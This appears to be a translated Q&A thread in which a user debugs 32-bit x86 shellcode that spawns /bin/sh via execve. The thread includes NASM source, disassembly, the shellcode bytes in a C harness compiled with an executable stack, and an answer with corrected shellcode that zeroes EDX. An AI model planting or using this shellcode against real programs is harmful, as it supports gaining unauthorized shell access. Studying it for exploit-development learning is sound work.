我编译了一个基本的漏洞利用程序(基本上,C中的源代码没有任何用处,只需执行执行Bash的操作码)。问题是当我执行二进制文件时:"分段错误"。
这就是我所做的:
executeBash.asm(NASM)
section .text
global _start
_start:
xor EAX, EAX ; EAX = 0
push EAX ; "\0\0\0\0"
push DWORD 0x68732F2F ; "//sh"
push DWORD 0x6E69622F ; "/bin"
mov EBX, ESP ; arg1 = "/bin//sh\0"
push EAX ; NULL -> args[1]
push EBX ; "/bin//sh\0" -> args[0]
mov ECX, ESP ; arg2 = args[]
mov AL, 0X0B ; syscall 11
int 0x80 ; excve("/bin//sh", args["/bin//sh", NULL], NULL)
在终端:
prompt$ nasm -f elf32 executeBash.asm
prompt$ ld -m elf_i386 executeBash.o -o executeBash
prompt$ objdump -M intel,i386 -d executeBash
executeBash: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 50 push eax
8048063: 68 2f 2f 73 68 push 0x68732f2f
8048068: 68 2f 62 69 6e push 0x6e69622f
804806d: 89 e3 mov ebx,esp
804806f: 50 push eax
8048070: 53 push ebx
8048071: 89 e1 mov ecx,esp
8048073: b0 0b mov al,0xb
8048075: cd 80 int 0x80
prompt$ # "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
prompt$ ./executeBash
$ exit
prompt$
ASM中的漏洞利用非常完美。
exploitBash.c
void main()
{
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
void(*fp) (void);
fp = (void *)&shellcode;
fp();
}
prompt$ gcc -m32 -fno-stack-protector -z execstack exploitBash.c -o exploitBash
prompt$ ./exploitBash
Segmentation fault
答案 0 :(得分:7)
您忘记设置edx,因此它包含上次使用的C代码,并且不太可能是有效的环境指针。在独立代码中,由于程序的初始启动状态,edx恰好为零。如果您使用strace,您可以看到execve返回-EFAULT,然后执行继续通过您的代码进入垃圾,然后真正的段错误。您可以修复shellcode,例如:
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\x31\xd2\xcd\x80";
(我在xor edx, edx之前添加了int 0x80。)